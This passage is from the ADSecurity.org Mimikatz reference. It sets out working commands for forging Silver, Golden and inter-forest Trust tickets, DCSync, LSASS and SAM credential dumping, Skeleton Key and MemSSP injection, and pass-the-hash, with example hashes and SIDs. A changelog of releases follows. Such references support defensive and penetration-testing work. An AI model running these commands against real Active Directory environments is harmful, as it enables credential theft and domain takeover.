S-1-5-21-518 Enterprise Admins SID: S-1-5-21-519  (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) Group Policy Creator Owners SID: S-1-5-21-520 Example Mimikatz Command to Create a Silver Ticket: The following Mimikatz command creates a Silver Ticket for the CIFS service on the server adsmswin2k8r2.lab.adsecurity.org. In order for this Silver Ticket to be successfully created, the AD computer account password hash for adsmswin2k8r2.lab.adsecurity.org needs to be discovered, either from an AD domain dump or by running Mimikatz on the local system as shown above (Mimikatz “privilege::debug” “sekurlsa::logonpasswords” exit). The NTLM password hash is used with the /rc4 paramteer. The service SPN type also needs to be identified in the /service parameter. Finally, the target computer’s fully-qualified domain name needs to be provided in the /target parameter. Don’t forget the domain SID in the /sid parameter. mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21- 1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit Trust Ticket Once the Active Directory Trust password hash is determined (Mimikatz “privilege::debug” “lsadump::trust /patch” exit), a trust ticket can be generated. https://adsecurity.org/?page_id=1821 Page 22 of 79 More background on Trust Tickets. Forging Internal AD Forest Trust Tickets In this example, Trust tickets leverage two additional tools Benjamin Delpy wrote called AskTGS and Kirbikator. Step 1: Dumping trust passwords (trust keys) Current Mimikatz versions can extract the trust keys (passwords). *  Mimikatz “privilege::debug” “lsadump::trust /patch” exit Step 2: Create a forged trust ticket (inter-realm TGT) using Mimikatz Forge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest (leveraging SIDHistory, “sids”, across trusts in Mimikatz, my “contribution” to Mimikatz). This enables full administrative access from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is effectively a Golden Ticket across the trust. The Mimikatz command to create a trust ticket is “kerberos::golden” /domain – the fully qualified domain name. In this example: “lab.adsecurity.org”. /sid – the SID of the domain. In this example: “S-1-5-21-3677078698-724690114-1972670770”. https://adsecurity.org/?page_id=1821 Page 23 of 79 /sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1581655573- 3923512380-696647894-519”. This parameter adds the provided SIDs to the SID History parameter. /user – username to impersonate /groups (optional) – group RIDs the user is a member of (the first is the primary group) default: 513,512,520,518,519 for the well-known Administrator’s groups (listed below). /ticket (optional) – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use. /ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use. /id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID). /startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0. /endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes). /renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes). /aes128 – the AES128 key /aes256 – the AES256 key Trust Ticket Specific Required Parameters: /target – the target domain’s FQDN. /service – the kerberos service running in the target domain (krbtgt). /rc4 – the NTLM hash for the service kerberos service account (krbtgt). /ticket – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use. Trust Ticket Default Groups: Domain Users SID: S-1-5-21-513 Domain Admins SID: S-1-5-21-512 Schema Admins SID: S-1-5-21-518 Enterprise Admins SID: S-1-5-21-519  (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) Group Policy Creator Owners SID: S-1-5-21-520 Mimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi” exit Note: Using the /sids parameter will create a trust ticket for the target AD domain that says the holder is an Enterprise Admin. https://adsecurity.org/?page_id=1821 Page 24 of 79 NOTE: Mimikatz generates Silver Tickets with a hard-coded domain value which may appear in some events. It’s also likely the domain field in logon/logoff events relating to a forged ticket will have anomalies when compared to valid Kerberos authentication. Step 3: Use the Trust Ticket file created in Step 2 to get a TGS for the targeted service in the destination domain. Save the TGS to a file. The resulting TGS provides EA access to the parent (root) domain’s Domain Controller by targeting the CIFS service in this example (but it could target any). Asktgs c:\temp\tickets\EA-ADSECLABCHILD.kirbi CIFS/ADSDC02.lab.adsecurity.org Step 4: Inject the TGS file created in Step 3 and then access the targeted service with the spoofed rights. Kirbikator lsa c:\temp\tickets\CIFS.ADSDC02.lab.adsecurity.org.kirbi https://adsecurity.org/?page_id=1821 Page 25 of 79 KERBEROS::Hash – hash password to keys KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets. Similar to functionality of “klist”. /export – export user tickets to files. Use SEKURLSA::TICKETS to dump Kerberos tickets for all authenticated users on the system. Note that there are circumstances where the user certificates won’t export. This requires running SEKURLSA::Tickets /export (with appropriate privileges). KERBEROS::PTC – pass the cache (NT6) *Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files. A good example of Mimikatz’s kerberos::ptc is when exploiting MS14-068 with PyKEK. PyKEK generates a ccache file which can be injected with Mimikatz using kerberos::ptc. KERBEROS::PTT – pass the ticket After a Kerberos ticket is found, it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. No special rights required. Similar to SEKURLSA::PTH (Pass-The-Hash). https://adsecurity.org/?page_id=1821 Page 26 of 79 /filename – the ticket’s filename (can be multiple) /diretory – a directory path, all .kirbi files inside will be injected. KERBEROS::Purge – purge all Kerberos tickets Similar to functionality of “klist purge”. Run this command before passing tickets (PTC, PTT, etc) to ensure the correct user context is used. KERBEROS::TGT – get current TGT for current user. LSADUMP The LSADUMP Mimikatz Module interacts with the Windows Local Security Authority (LSA) to extract credentials. Most of these commands require either debug rights (privlege::debug) or local System. By default, the Administrators group has Debug rights. Debug still has to be “activated” by running “privilege::debug”. LSADUMP:Backupkeys Requires Administrator rights. https://adsecurity.org/?page_id=1821 Page 27 of 79 LSADUMP::Cache – Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives) Requires Administrator rights. LSADUMP::ChangeNTLM – Ask a server to set a new password/ntlm for one user. LSADUMP::DCShadow – Push replication changes to a Domain Controller.  Read more at DCShadow.com. This requires full AD admin rights or KRBTGT pw hash. DCShadow temporarily sets the computer to be a “DC” for the purposes of replication: Creates 2 objects in the AD forest Configuration partition. Updates the SPN of the computer used to include “GC” (Global Catalog) and “E3514235-4B06-11D1- AB04-00C04FC2DCD2” (AD Replication). More info on Kerberos Service Principal Names in the ADSecurity SPN section. Pushes the updates to DCs via DrsReplicaAdd and KCC. Removes the created objects from the Configuration partition. https://adsecurity.org/?page_id=1821 Page 28 of 79 https://adsecurity.org/?page_id=1821 Page 29 of 79 Temporary DC object in the Configuration partition LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account) Requires membership in Domain Administrator, domain Administrators, or custom delegation. A major feature added to Mimkatz in August 2015 is “DCSync” which effectively “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller. DCSync was written by Benjamin Delpy and Vincent Le Toux. As of Mimikatz version 2.1 alpha 20160501, DCSync works with renamed domains. The exploit method prior to DCSync was to run Mimikatz or Invoke-Mimikatz on a Domain Controller to get the KRBTGT password hash to create Golden Tickets. With Mimikatz’s DCSync and the appropriate rights, the attacker can pull the password hash, as well as previous password hashes, from a Domain Controller over the network without requiring interactive logon or copying off the Active Directory database file (ntds.dit). Special rights are required to run DCSync. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. Note that Read-Only Domain Controllers are not only allowed to pull password data for users by default. How DCSync works: 1. Discovers Domain Controller in the specified domain name. 2. Requests the Domain Controller replicate the user credentials via GetNCChanges (leveraging Directory Replication Service (DRS) Remote Protocol) I have previously done some packet captures for Domain Controller replication and identified the intra-DC communication flow regarding how Domain Controllers replicate. The Samba Wiki describes the DSGetNCChanges function: “The client DC sends a DSGetNCChanges request to the server when the first one wants to get AD objects updates from the second one. The response contains a set of updates that the client has to apply to its NC replica. … When a DC receives a DSReplicaSync Request, then for each DC that it replicates from (stored in RepsFrom data structure) it performs a replication cycle where it behaves like a client and makes DSGetNCChanges requests to that DC. So it gets up-to-date AD objects from each of the DC’s which it replicates from.” DCSync Options: /all – DCSync pull data for the entire domain. https://adsecurity.org/?page_id=1821 Page 30 of 79 /user – user id or SID of the user you want to pull the data for. /domain (optional) – FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to connect to. If this parameter is not provided, Mimikatz defaults to the current domain. /csv – export to csv /dc (optional) – Specify the Domain Controller you want DCSync to connect to and gather data. There’s also a /guid parameter. DCSync Command Examples: Pull password data for the KRBTGT user account in the rd.adsecurity.org domain: Mimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt” exit Pull password data for the Administrator user account in the rd.adsecurity.org domain: Mimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator” exit Pull password data for the ADSDC03 Domain Controller computer account in the lab.adsecurity.org domain: Mimikatz  “lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$” exit LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use /patch for a subset of data, use /inject for everything. Requires System or Debug rights. /inject – Inject LSASS to extract credentials /name – account name for target user account https://adsecurity.org/?page_id=1821 Page 31 of 79 /id – RID for target user account /patch – patch LSASS. Often service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged on to the computer an attacker dump credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to create Kerberos Golden Tickets. Command:  mimikatz lsadump::lsa /inject exit Dumps credential data in an Active Directory domain when run on a Domain Controller. Requires administrator access (with debug rights) or Local SYSTEM rights The account with RID 502 is the KRBTGT account and the account with RID 500 is the default administrator for the domain. Here’s the result when running LSADUMP::lsa /patch which only dumps the NTLM password hashes. https://adsecurity.org/?page_id=1821 Page 32 of 79 LSADUMP::NetSync NetSync provides a simple way to use a DC computer account password data to impersonate a Domain Controller via a Silver Ticket and DCSync the target account’s information including the password data. LSADUMP::RpData LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. Requires System or Debug rights. It contains NTLM, and sometimes LM hash, of users passwords. It can work in two modes: online (with SYSTEM user or token) or offline (with SYSTEM & SAM hives or backup). Requires administrator access (with debug rights) or Local SYSTEM rights when run against an online SAM. https://adsecurity.org/?page_id=1821 Page 33 of 79 Getting an impersonated SYSTEM token: Mimikatz “PRIVILEGE::Debug” “TOKEN::elevate” LSADUMP::Secrets – get the SysKey to decrypt SECRETS entries (from registry or hives). Requires System or Debug rights. LSADUMP::SetNTLM – Ask a server to set a new password/ntlm for one user. LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Requires System or Debug rights. Extracts data from Active Directory for existing trust relationships for the domain. The trust key (password) is displayed as well. https://adsecurity.org/?page_id=1821 Page 34 of 79 MISC The MISC Mimikatz module is kind of a catch-all for commands that don’t quite fit elsewhere. The most well known commands in this module are MISC::AddSID, MISC::MemSSP, and MISC::Skeleton. MISC::AddSid – Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Requires System or Debug rights. NOTE: ADDSID has moved to the SID module in the 2.1 release branch. https://adsecurity.org/?page_id=1821 Page 35 of 79 MISC::Cmd – Command Prompt (without DisableCMD). Requires Administrator rights. MISC::Compressme – Compresses Mimikatz file to a new file called “mimikatz_x64.compressed” MISC::Detours – (experimental) Try to enumerate all modules with Detours-like hooks Requires Administrator rights. https://adsecurity.org/?page_id=1821 Page 36 of 79 MISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials by patching LSASS in memory with new SSP – no reboot required (rebooting clears the memssp Mimikatz injects). This post on Mimikatz SSP describes in-memory patching as well as more persistent SSP techniques. Requires Administrator rights. Mandiant presentation on MemSSP MISC::MFLT – Gathers details on loaded drivers, including driver altitude. Available starting with Mimikatz v2.1.1 (11/28/2017). https://adsecurity.org/?page_id=1821 Page 37 of 79 MISC::Ncroutemon – Juniper Manager (without DisableTaskMgr) MISC::Regedit – Registry Editor (without DisableRegistryTools) Requires Administrator rights. MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller. Requires Administrator rights. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password. https://adsecurity.org/?page_id=1821 Page 38 of 79 MISC::Taskmgr – Task Manager (without DisableTaskMgr). Requires Administrator rights. MISC::Wifi – No longer in MISC. Likely moved to DPAPI:Wifi which may include similar functionality. MISC::WP MINESWEEPER MINESWEEPER::Infos – Provide mine info in minesweeper Net NET::Alias https://adsecurity.org/?page_id=1821 Page 39 of 79 NET::Group NET::ServerInfo https://adsecurity.org/?page_id=1821 Page 40 of 79 NET::Session NET::Share NET::Stats NET::TOD NET::User https://adsecurity.org/?page_id=1821 Page 41 of 79 NET::WSession PRIVILEGE PRIVILEGE::Backup – get backup privilege/rights. Requires Debug rights. PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands). By default, the Administrators group has Debug rights. Debug still has to be “activated” by running “privilege::debug”. The debug privilege allows someone to debug a process that they wouldn’t otherwise have access to. For example, a process running as a user with the debug privilege enabled on its token can debug a service running as local system. http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx Benjamin’s Remark: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 means that the required privilege is not held by the client (mostly you’re not an administrator :smirk:) https://adsecurity.org/?page_id=1821 Page 42 of 79 PRIVILEGE::Driver – get driver privilege/rights. Requires Debug rights. PRIVILEGE::ID – get privilege/rights by its ID. Requires Debug rights. PRIVILEGE::Name – get privilege/rights by its name. Requires Debug rights. PRIVILEGE::Restore – get restore privilege/rights. Requires Debug rights. PRIVILEGE::Security – get security privilege/rights. Requires Debug rights. PRIVILEGE::SysEnv – get privilege/rights to manage system environment. Requires Debug rights. PRIVILEGE::TCB – get TCB privilege/rights(likely act as part of the operating system right). Requires elevated rights (still TBD). PROCESS The Mimikatz PROCESS module provides the ability to gather data on processes and interact with processes. PROCESS::Exports – list exports https://adsecurity.org/?page_id=1821 Page 43 of 79 PROCESS::Imports – list imports https://adsecurity.org/?page_id=1821 Page 44 of 79 PROCESS::List – List running processes Requires Administrator rights. https://adsecurity.org/?page_id=1821 Page 45 of 79 PROCESS::Resume – resume a process PROCESS::Run –  Run https://adsecurity.org/?page_id=1821 Page 46 of 79 PROCESS::Start – start a process PROCESS::Stop – terminate a process PROCESS::Suspend – suspend a process RPC The RPC module provides remote control of mimikatz. RPC::Close RPC::Connect https://adsecurity.org/?page_id=1821 Page 47 of 79 RPC::Enum https://adsecurity.org/?page_id=1821 Page 48 of 79 RPC::Server https://adsecurity.org/?page_id=1821 Page 49 of 79 SEKURLSA The SEKURLSA Mimikatz module interacts with protected memory. This module extracts passwords, keys, pin codes, tickets from the memory of lsass (Local Security Authority Subsystem Service). In order to interact with LSASS, the Mimikatz process requires appropriate rights: Administrator, to get debug privilege via “PRIVILEGE::Debug” SYSTEM rights (“TOKEN::elevate”) However, running against a dumped LSASS process file (i.e. LSASS.dmp), elevated rights are not required. SEKURLSA::Backupkeys – get preferred backup master keys SEKURLSA::Credman – List Credentials Manager https://adsecurity.org/?page_id=1821 Page 50 of 79 SEKURLSA::Dpapi – list cached MasterKeys SEKURLSA::DpapiSystem – DPAPI_SYSTEM secret SEKURLSA::Ekeys – list Kerberos encryption keys https://adsecurity.org/?page_id=1821 Page 51 of 79 SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account) https://adsecurity.org/?page_id=1821 Page 52 of 79 SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data SEKURLSA::LiveSSP – Lists LiveSSP credentials https://adsecurity.org/?page_id=1821 Page 53 of 79 SEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on user and computer credentials. Dumps password data in LSASS for currently logged on (or recently logged on) accounts as well as services running under the context of user credentials. Account passwords are stored in memory in a reversible manner. If they are in memory (prior to Windows 8.1/Windows Server 2012 R2 they were), they are displayed. Windows 8.1/Windows Server 2012 R2 doesn’t store the account password in this manner in most cases. KB2871997 “back-ports” this security capability to  Windows 7, Windows 8, Windows Server 2008R2, and Windows Server 2012, though the computer needs additional configuration after applying KB2871997. Requires administrator access (with debug rights) or Local SYSTEM rights Windows Server 2008 R2 System (Password is shown).                                                 https://adsecurity.org/?page_id=1821 Page 54 of 79 Windows Server 2012 R2 system – no cleartext password shown https://adsecurity.org/?page_id=1821 Page 55 of 79 Services running with account credentials are also dumped using this command. Note that only services that are running (credentials in memory) can be dumped in this manner. https://adsecurity.org/?page_id=1821 Page 56 of 79 SEKURLSA::Minidump – switch to LSASS minidump process context There are several different ways to dump LSASS:  procdump, PowerShell, Task Manager, etc. https://adsecurity.org/?page_id=1821 Page 57 of 79 Note that Minidumps need to be read using the same platform it was dumped from NT5 Win32 or NT5x64 or NT6 Win32 or NT6 x64. Another option is to dump the LSASS process with Task Manager Sekurlsa::minidump can open the dump file. https://adsecurity.org/?page_id=1821 Page 58 of 79 SEKURLSA::MSV – List LM & NTLM credentials https://adsecurity.org/?page_id=1821 Page 59 of 79 SEKURLSA::Process – switch to LSASS process context SEKURLSA::Pth – Pass-the-Hash and Over-Pass-the-Hash (aka pass the key). Mimikatz can perform the well-known operation ‘Pass-The-Hash’ to run a process under another credentials with NTLM hash of the user’s password, instead of its real password. For this, it starts a process with a fake identity, then replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real password). https://adsecurity.org/?page_id=1821 Page 60 of 79 /user – the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account. /domain – the fully qualified domain name – without domain or in case of local user/admin, use computer or server name, workgroup or whatever. /rc4 or /ntlm – optional – the RC4 key / NTLM hash of the user’s password. /run – optional – the command line to run – default is: cmd to have a shell. Benjamin’s Remarks: This command does not work with minidumps (nonsense); it requires elevated privileges (privilege::debug or SYSTEM account), unlike ‘Pass-The-Ticket’ which uses one official API ; this new version of ‘Pass-The-Hash’ replaces RC4 keys of Kerberos by the ntlm hash (and/or replaces AES keys) – it permits to the Kerberos provider to ask TGT tickets! ; ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable) ; AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash. Benjamin’s post on overpass-the-hash. SEKURLSA::SSP – Lists SSP credentials https://adsecurity.org/?page_id=1821 Page 61 of 79 SEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users). /export – optional – tickets are exported in .kirbi files. They start with user’s LUID and group number (0 = TGS, 1 = client ticket(?) and 2 = TGT) Similar to credential dumping from LSASS, using the sekurlsa module, an attacker can get all Kerberos ticket data in memory on a system, including those belonging to an admin or service. This is extremely useful if an attacker has compromised a web server configured for Kerberos delegation that https://adsecurity.org/?page_id=1821 Page 62 of 79 users access with a backend SQL server. This enables an attacker to capture and reuse all user tickets in memory on that server. The “kerberos::tickets” mimikatz command dumps the current logged-on user’s Kerberos tickets and does not require elevated rights. Leveraging the sekurlsa module’s capability to read from protected memory (LSASS), all Kerberos tickets on the system can be dumped. Command:  mimikatz sekurlsa::tickets exit Dumps all authenticated Kerberos tickets on a system. Requires administrator access (with debug) or Local SYSTEM rights The following screenshot shows dumped password and Kerberos tickets (TGS & TGT) of another user who is a Domain Admin (LukeSkywalker). https://adsecurity.org/?page_id=1821 Page 63 of 79 The following screenshot shows dumped credentials and Kerberos tickets (TGS & TGT) of another admin (HanSolo). https://adsecurity.org/?page_id=1821 Page 64 of 79 The following screenshot shows dumped credentials and Kerberos tickets (TGS & TGT) for a SQL service account (svc-SQLDBEngine01). https://adsecurity.org/?page_id=1821 Page 65 of 79 SEKURLSA::Trust – get trust keys (I think this is deprecated in favor of lsadump::trust /patch) SEKURLSA::TSPKG – Lists TsPkg credentials https://adsecurity.org/?page_id=1821 Page 66 of 79 SEKURLSA::Wdigest – List WDigest credentials https://adsecurity.org/?page_id=1821 Page 67 of 79 SERVICE SERVICE::+  (plus sign)- Install Mimikatz service (‘mimikatzsvc’) SERVICE::-  (minus sign) – Uninstall Mimikatz service (‘mimikatzsvc’) https://adsecurity.org/?page_id=1821 Page 68 of 79 SERVICE::List – List Services SERVICE::Me SERVICE::Preshutdown – preshutdown service SERVICE::Remove – Remove service SERVICE::Resume – resume service SERVICE::Shutdown – shutdown service SERVICE::Start – Start a service SERVICE::Stop – Stop service SERVICE::Suspend – Suspend the service SID The Mimikatz SID module replaces MISC::AddSID. Use SID::Patch to patch the ntds service. SID::add – Add a SID to SIDHistory of an object SID::clear – Clear SIDHistory of an object https://adsecurity.org/?page_id=1821 Page 69 of 79 SID::lookup – Name (/name) or SID (/sid) lookup SID::modify – Modify object SID of an object SID::patch – Patch NTDS service SID::query – Query object by SID or name https://adsecurity.org/?page_id=1821 Page 70 of 79 STANDARD STANDARD::Answer– Answer to the Ultimate Question of Life, the Universe, and Everything. STANDARD::Base64 – switch output to base64 output STANDARD::CD – change or display current directory STANDARD::CLS – Clear screen STANDARD::Coffee – show an ASCII image of coffee 🙂 STANDARD::Exit– quit Mimikatz STANDARD::Hostname – Displays system local host STANDARD::LocalTime – Displays system local date and time (OJ command) STANDARD::Log – Send Mimikatz data to log file STANDARD::MarkRus– Pass-the-Hash information. 😉 Removed in Mimikatz 2.1.1 STANDARD::Sleep – sleep an amount of milliseconds STANDARD::Version – display version information https://adsecurity.org/?page_id=1821 Page 71 of 79 SYSENV The Mimikatz SYSENV module provides the ability to manage system environment variables. SYSENV::List SYSENV::Get SYSENV::Set SYSENV::Del TOKEN The Mimikatz Token module enables Mimikatz to interact with Windows authentication tokens, including grabbing and impersonating existing tokens. TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box using the Windows API. Requires Administrator rights. Find a domain admin credential on the box and use that token: token::elevate /domainadmin TOKEN::List – list all tokens of the system https://adsecurity.org/?page_id=1821 Page 72 of 79 TOKEN::Revert – revert to process token TOKEN::Run – Run TOKEN::Whoami – Display current identity TS TS::MultiRDP – (experimental) Patch Terminal Server service to allow multiple users TS::Sessions – List TS/RDP sessions. https://adsecurity.org/?page_id=1821 Page 73 of 79 TS::Remote  VAULT VAULT::List – list vault credentials VAULT::Cred – cred Mimikatz Version History Sourced from Mimikatz release Github page https://adsecurity.org/?page_id=1821 Page 74 of 79 Mimikatz 2.1.1 – Release Date: 12/20/2017 2.1.1 20171220 Clear event logs without the event log logging 1102 “Event Log Cleared” Mimikatz 2.1.1 – Release Date: 12/19/2017 2.1.1 20171219 Mimikatz 2.1.1 – Release Date: 12/18/2017 2.1.1 20171218 mimidrv updated for Windows 10 version 1709, (x64) Mimikatz 2.1.1 – Release Date: 11/28/2017 2.1.1 20171128 Mimikatz 2.1.1 – Release Date: 11/06/2017 2.1.1 20171106 [fix #107] remove _vscwprintf dependency with mimilove on Windows 2000 [credits] with his work on AD, Vincent Le Toux (@vletoux) is starring as co-author 🙂 [internal] DRSR RPC [fix] dcsync export as CSV without junk chars between username and NTLM hash Mimikatz 2.1.1 – Release Date: 08/13/2017 2.1.1 20170813 crypto::extract now supports CAPI & BCrypt (RSA/AES/DES/3DES/DESX/RC4/RC2…) [new] lsadump::changentlm to *change* user password/hash to another password/hash … Mimikatz Release Date: 6/06/2016 2.1 alpha 20160506.1 (oe.eo) edition [remove] mimikatz lsadump::dcsync req v10 & rep v9 [future fix] mimikatz lsadump::dcsync pDrsExtensionsInt->dwExtCaps = MAXDWORD32 Mimikatz Release Date: 6/06/2016 2.1 alpha 20160606 (oe.eo) edition [fix #47] mimikatz lsadump::dcsync ‘Fun with flags’ to support AD Privileged Access Management in 2016 TP5 (req v10 & rep v9) Mimikatz Release Date: 6/04/2016 2.1 alpha 20160604 (oe.eo) edition [fix #46] MSV structure alignment for Windows 10 > LTSB (LSAISo & normal) [enhancement] SID/Name lookup & LDAP query now with system arg (not only local/current domain) Mimikatz Release Date: 6/01/2016 2.1 alpha 20160601 (oe.eo) edition [fix] mimikatz lsadump::dcsync now supports AD with recycle bin enabled (thanks to Marcus Rath for report) https://adsecurity.org/?page_id=1821 Page 75 of 79 Mimikatz Release Date: 5/25/2016 2.1 alpha 20160525 (oe.eo) edition lsadump::netsync to ask a DC to send current and previous NTLM hash of DC/SRV/WKS Lots of thanks to @asolino for his help! Mimikatz Release Date: 5/22/2016 2.1 alpha 20160522 (oe.eo) edition [fix #39] Removing 2 bytes of alignment when using LSAIso with MSV Mimikatz Release Date: 5/06/2016 2.1 alpha 20160506 (oe.eo) edition [fix #36] Replace wcsicmp by _wcsicmp to avoid warnings with moderns VS New SID module [remove] misc::addsid [new] sid:: module, to lookup, query, modify, add… (2003/2008r2/2012r2 right now) Mimikatz Release Date: 4/30/2016 2.1 alpha 20160501 (oe.eo) edition [close #35] DCSync works with renamed domains Thanks to @rmbolger & @MichaelGrafnetter, DCSync now deals with msDS-ReplicationEpoch / dwReplEpoch Mimikatz Release Date: 3/27/2016 2.1 alpha 20160327 (oe.eo) edition Welcome to Windows 10 LTSB & current [remove] mimidrv & mimikatz kernel module: Process & Object callbacks remover are not anymore in the program [internal] Windows 10 is now splitted in 1507 (LTSB) and 1511 (current) [internal] mimidrv: Windows 10 support added [internal] mimilib WinDBG module & mimikatz::sekurlsa: Windows 10 MSV / Kerberos Tickets are not specific anymore (offsets table) [internal] Using KULL_M_MEMORY_GLOBAL_OWN_HANDLE instead of local variable in each function Mimikatz Release Date: 2/29/2016 2.1 alpha 20160229 (oe.eo) edition System Environment Variables & other stuff [new] System Environment Variables user module [new] System Environment Variables kernel IOCTL for Set [enhancement] privilege::sysenv [enhancement] Busylight [enhancement] misc::skeleton can avoid anti-AES patching for aware clients with /letaes Mimikatz Release Date: 2/17/2016 2.1 alpha 20160217 (oe.eo) edition [new] crypto::certificates /silent & /nokey flags https://adsecurity.org/?page_id=1821 Page 76 of 79 [new] crypto::keys /silent flag [new] kull_m_busylight module now support protocol for new devices Mimikatz Release Date: 2/07/2016 Some DPAPI stuff [new] vault module now handles more Vault types, Attributes and Properties (with /attributes) [new] misc::compressme to create a compressed version of mimikatz [new] dpapi::cred now handles legacy (NT5) multiple credentials [new] dpapi::wifi & dpapi::wwan to deal with network profiles [internal] kuhl_m_vault: vault::list now deals with SID / credentials attributes (with one incorrect align.) [internal] kull_m_string: removed unused kull_m_string_suspectUnicodeStringStructure [internal] kull_m_string: added kull_m_string_printSuspectUnicodeString [internal] kull_m_string: added dirty kull_m_string_quickxml_simplefind [internal] kull_m_memory: quick compress & decompress routines [internal] kull_m_dpapi: added blob flags descriptions [internal] kull_m_dpapi: fixed blob protection flags description for system [internal] kull_m_dpapi: removed unused kull_m_dpapi_unprotect_backupkey_with_secret [internal] kull_m_cred: added legacy (NT5) credentials structures & routines Mimikatz Release Date: 1/31/2016 Lots of internals and 2003 SP1 support [new] sekurlsa module and its kerberos submodule now work with old 2003 SP1 (live or dump) [remove] misc::wifi with WLanAPI will be replaced with dpapi::wifi raw access [fix] crypto::certificate buffer free at the right place [internal] new kull_m_file Find function with callback [internal] removed kull_m_file functions (read/write/file exist) with environment-variables, now used for all command-lines [internal] kull_m_crypto_hash better checks for CRC32 trick [internal] mimilove for Windows 2000 banner update [internal] crypto::system now works with buffers (for future registry access) [internal] kerberos::ptt & crypto::system call kull_m_file_Find instead of their own implementation [internal] remove CrtlHandler, from mimikatz main modules, when exiting to let PowerShell clean [internal] expand command lines environment-variables from mimikatz main modules Mimikatz Release Date: 1/16/2016 Crypto, crypto everywhere… [new] crypto::providers and crypto::certificates now list provider types [internal] Removed kull_m_crypto_crc32 routine from crypto module, relies now on cryptdll using CALG_CRC32 with kull_m_crypto_hash [internal] Removed incorrect usage of BOOL instead of NTSTATUS in kuhl_m_pac_validationInfo_to_PAC Mimikatz Release Date: 1/11/2016 Crypto & Kerberos enhancements [fix] dpapi::capi now deals with AT_SIGNATURE keys https://adsecurity.org/?page_id=1821 Page 77 of 79 [fix] sekurlsa::kerberos / kerberos:: encryption type are now signed [new] kerberos::ask to ask / save TGS from current TGT [new] crypto::system to describe/to export Windows System Certificate (cert, crl, ctl, keyid) [internal] smaller banner for smaller displays [internal] Copyrights for 2016 [internal] kull_m_file can deal with environment-variable strings in paths [internal] kull_m_crypto new types for CERT_PROP_*_ID. Mimikatz Release Date: 1/05/2016 MSV & Kerberos fixes, LSA and Privilege enhancements [fix] sekurlsa::msv & mimilib for Windows 10 build 10586 [fix #20] sekurlsa::tickets (display & export) for NT 6 != Windows 10 [close #16] kerberos::golden now with ~NetBios name in LogonDomainName field of the PAC [new] privilege module shortcuts (driver, security, tcb, backup, restore) and functions (by id or name) [new] lsadump::dcsync and lsadump::lsa /inject ‘NTLM-Strong-NTOWF’ in Supplemental Credentials structures (Windows 2016 TP 4) [internal] NtSetSystemInformation can now be used in code Mimikatz Release Date: 11/12/2015 mimikatz & mimilib sekurlsa module ready for Windows 10 build 10586 